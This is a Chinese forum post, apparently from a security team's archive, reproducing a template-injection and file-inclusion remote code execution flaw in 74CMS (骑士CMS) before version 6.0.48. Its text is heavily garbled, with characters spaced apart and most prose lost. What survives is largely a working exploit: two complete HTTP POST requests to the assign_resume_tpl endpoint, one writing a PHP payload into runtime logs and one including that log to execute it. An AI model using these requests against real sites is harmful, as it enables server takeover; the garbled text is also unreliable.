搜索

[7630] 2021-07-05_骑士CMS模版注入+文件包含getshell漏洞复现

文档创建者:s7ckTeam
浏览次数:54
最后更新:2025-01-17
2021-07-05_骑士CMS模版注入+文件包含getshell漏洞复现 C M S + g e t s h e l l F 1 2 s e c   2 0 2 1 - 0 7 - 0 5   D X X   C M S ,   P H P + M Y S Q L     +   使 T h i n k P H P 3 . 2 . 3 2 0 0 9 ,   线 H R 7 2 0 1 6 + D I Y 便     w i n d o w s 1 0 + N g i n x + M y S Q L + P H P 使 p h p s t u d y P H P 使   P H P   5 . 5 M y S Q L   5 . 7 . 6 使 P H P 5 . 4 . 4 5 c m s : h t t p s : / / p a n . h a l l o l c k . c o m / s / y 0 6 I 6   . &

  / A p p l i c a t i o n / C o m m o n / C o n t r o l l e r / B a s e C o n t r o l l e r . c l a s s . p h p a s s i g n _ r e s u m e _ t p l : C M S   <   6 . 0 . 4 8 > P O S T P O S T   h t t p : / / w w w . 7 4 c m s . c o m / n e w s / s h o w - 2 4 9 7 . h t m l h t t p : / / y o u r - i p / i n d e x . p h p ? m = h o m e & a = a s s i g n _ r e s u m e _ t p l P O S T : v a r i a b l e = 1 & t p l = < ? p h p   p h p i n f o ( ) ;   o b _ f l u s h ( ) ; ? > / r / n < q s c m s / c o m p a n y _ s h o w   = " i n f o "   i d = " $ _ G E T [ ' i d ' ] " / > P O S T   / 7 4 c m s v 6 . 0 . 2 0 / u p l o a d / i n d e x . p h p ? m = h o m e & a = a s s i g n _ r e s u m e _ t p l   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 1 . 6 C o n t e n t - L e n g t h :   9 8 C a c h e - C o n t r o l :   m a x - a g e = 0 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 ;   r v : 8 9 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 8 9 . 0 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , * / * ; q = 0 . 8 A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 8 , z h - T W ; q = 0 . 7 , z h - H K ; q = 0 . 5 , e n - U S ; q = 0 . 3 , e n ; q = 0 . 2 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e R e f e r e r :   h t t p : / / 1 9 2 . 1 6 8 . 1 . 6 / 7 4 c m s v 6 . 0 . 2 0 / u p l o a d / i n d e x . p h p ? m = h o m e & a = a s s i g n _ r e s u m e _ t p l D N T :   1 C o n n e c t i o n :   c l o s e C o o k i e :   P H P S E S S I D = v j 1 2 p 9 l 3 p n q k c 0 9 o s t u m 5 m 7 m f u ;   t h i n k _ l a n g u a g e = z h - C N ;   t h i n k _ t e m p l a t e = d e f a u l t U p g r a d e - I n s e c u r e - R e q u e s t s :   1 C a c h e - C o n t r o l :   m a x - a g e = 0 v a r i a b l e = 1 & t p l = < ? p h p   p h p i n f o ( ) ;   o b _ f l u s h ( ) ; ? > / r / n < q s c m s / c o m p a n y _ s h o w   h = " i n f o "   i d = " $ _ G E T [ ' i d ' ] " / > :   u p l o a d d a t a R u n t i m e L o g s H o m e
P O S T P O S T   h t t p : / / y o u r - i p / i n d e x . p h p ? m = h o m e & a = a s s i g n _ r e s u m e _ t p l   P O S T :   v a r i a b l e = 1 & t p l = d a t a / R u n t i m e / L o g s / H o m e / 2 0 _ 1 2 _ 2 2 . l o g P O S T   / 7 4 c m s v 6 . 0 . 2 0 / u p l o a d / i n d e x . p h p ? m = h o m e & a = a s s i g n _ r e s u m e _ t p l   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 1 . 6 C o n t e n t - L e n g t h :   5 2 C a c h e - C o n t r o l :   m a x - a g e = 0 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 ;   r v : 8 9 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 8 9 . 0 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , * / * ; q = 0 . 8 A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 8 , z h - T W ; q = 0 . 7 , z h - H K ; q = 0 . 5 , e n - U S ; q = 0 . 3 , e n ; q = 0 . 2 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e R e f e r e r :   h t t p : / / 1 9 2 . 1 6 8 . 1 . 6 / 7 4 c m s v 6 . 0 . 2 0 / u p l o a d / i n d e x . p h p ? m = h o m e & a = a s s i g n _ r e s u m e _ t p l D N T :   1 C o n n e c t i o n :   c l o s e C o o k i e :   P H P S E S S I D = v j 1 2 p 9 l 3 p n q k c 0 9 o s t u m 5 m 7 m f u ;   t h i n k _ l a n g u a g e = z h - C N ;   t h i n k _ t e m p l a t e = d e f a u l t U p g r a d e - I n s e c u r e - R e q u e s t s :   1 C a c h e - C o n t r o l :   m a x - a g e = 0 v a r i a b l e = 1 & t p l = . / d a t a / R u n t i m e / L o g s / H o m e / 2 1 _ 0 7 _ 0 1 . l o g h t t p : / / w w w . 7 4 c m s . c o m / d o w n l o a d / i n d e x . h t m l
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理